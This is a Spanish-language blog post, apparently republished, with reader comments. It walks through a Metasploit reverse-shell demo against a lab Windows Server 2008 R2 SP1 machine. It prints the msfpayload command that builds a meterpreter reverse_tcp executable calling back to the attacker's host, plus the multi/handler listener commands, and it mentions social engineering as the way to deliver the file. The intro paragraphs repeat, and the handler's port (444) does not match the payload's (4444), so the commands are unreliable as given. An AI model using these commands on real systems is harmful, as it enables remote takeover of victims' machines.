Metasploit en Windows Server 2008 R2 SP1
Gracias a C0lds0ft tendremos en el blog una serie de entradas con la que se pretende demostrar varias técnicas de Hacking con Metasploit en Windows Server 2008 R2 SP1.
Este primer video contiene una técnica conocida llamada conexión en reversa (shell reverse), realizado mediante la generación de un archivo ejecutable con la herramienta msfpayload.
En esta demostración con fines educativos se observa un Windows Server 2008 R2 SP1 con IP 192.168.1.39 corriendo sobre un entorno virtualizado del servicio Hyper-V Virtualization y la conexión al equipo atacante mediante Putty (192.168.1.254) donde previamente se construye el archivo .exe, llamado C0lds0ft.exe:
Con este archivo generamos la conexión en reversa desde la víctima, y aquí el ingenio y las técnicas de ingeniería social que se utilice para hacerlo llegar al Target son las que usted tendrá que tener en cuenta para no caer en este tipo de técnicas. Posterior a enviado se procede a poner a la escucha así:
Continuar leyendo en fuente original BinaryTI (Demo en video I y II)
Este primer video contiene una técnica conocida llamada conexión en reversa (shell reverse), realizado mediante la generación de un archivo ejecutable con la herramienta msfpayload.
En esta demostración con fines educativos se observa un Windows Server 2008 R2 SP1 con IP 192.168.1.39 corriendo sobre un entorno virtualizado del servicio Hyper-V Virtualization y la conexión al equipo atacante mediante Putty (192.168.1.254) donde previamente se construye el archivo .exe, llamado C0lds0ft.exe:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.254 LPORT=4444 X >/root/Escritorio/C0lds0ft.exe
Con este archivo generamos la conexión en reversa desde la víctima, y aquí el ingenio y las técnicas de ingeniería social que se utilice para hacerlo llegar al Target son las que usted tendrá que tener en cuenta para no caer en este tipo de técnicas. Posterior a enviado se procede a poner a la escucha así:
use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.1.254 set LPORT 444 exploit
Continuar leyendo en fuente original BinaryTI (Demo en video I y II)
Todo muy lindo, pero la "victima" no tiene antivirus en el ejemplo.
ResponderBorrarSeamos sinceros negro, con un server minimamente tenes un Forfront (no un antivirus marca Marolio).
Anónimo, cuando se hacen demos generalmente se plantea un caso sencillo para facilitar la compresión.
ResponderBorrarEstoy de acuerdo que un AV puede ayudar pero tampoco es la panacea. En todo caso la falta de seguridad por capas sería el problema y ahí sí coincido en que el ataque sería más difícil (no imposible) y eso aplica a cualquier SO. Y eso sin siquiera hablar de amenazas persistentes APTs.
Cristian